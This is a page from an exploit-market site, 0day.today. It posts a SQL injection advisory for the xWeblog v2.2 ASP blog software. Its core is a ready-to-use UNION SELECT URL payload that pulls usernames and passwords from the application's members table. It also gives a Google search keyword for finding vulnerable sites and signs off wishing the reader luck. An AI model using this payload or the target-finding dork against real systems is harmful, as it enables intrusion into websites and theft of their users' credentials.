[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xWeblog v2.2 (oku.asp?makale_id) SQL Injection Vulnerability

Author
KnocKout
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14386
Category
web applications
Date add
08-10-2010
Platform
asp
============================================================
xWeblog v2.2 (oku.asp?makale_id) SQL Injection Vulnerability
============================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : xWeblog v2.2
~Software: http://www.aspdunyasi.com/goster.asp?id=19
~Vulnerability Style : (SQLi)
~Google Keywords : "XWEBLOG"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
    ~~~~~~~~ Explotation ~~~~~~~~~~~
  
    SQL Injection
    ================================
    http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
    ================================
          [+]  SQL Injected!
  
            
        
      GoodLucK ;)



#  0day.today [2024-11-16]  #